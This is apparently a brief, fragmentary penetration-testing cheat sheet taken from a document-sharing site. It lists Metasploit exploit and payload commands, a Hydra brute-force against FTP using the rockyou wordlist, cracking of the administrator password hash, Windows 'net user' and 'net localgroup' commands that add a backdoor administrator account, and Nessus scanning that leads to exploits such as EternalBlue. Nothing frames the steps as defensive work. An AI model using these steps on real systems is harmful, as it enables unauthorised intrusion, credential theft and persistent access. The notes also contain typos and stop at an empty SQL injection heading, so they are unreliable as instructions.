Beruflich Dokumente
Kultur Dokumente
search vulnerability_name
use exploit/name
show payloads
set payload payload_name
SHOW OPTIONS
SET RHOST HOSTNAME
SHOW OPTIONS
EXPLOIT
=====Meterpreter====
==cain===
1: set target ip
2: enumerate users
3: then use hydra -l user -P rockyou.txt ftp://ip
4: reconnect with the user
5: install able
6: reconnect and goto hashes
7: find admin ending with 500
8: send to cracker
9: reset initial position
10: and start hence password will be cracked now login with admin and create new
user
11: net user username password /add (for adding users)
12: net localgroup administratros username /add (for adding as an administrator)
*********NESSUS**************
1: start nessus service
/etc/init.d/nessusd start
2: start scanning
3: find exploit number Something like MS17_010_eternalblue etc
4: Exploit
=====NMAP=======
nmap -A IP Address
===hydra===
hydra -L dictionary path -P dictionary path ftp:ip (if you dont know username
password)
====SQL INJECTION========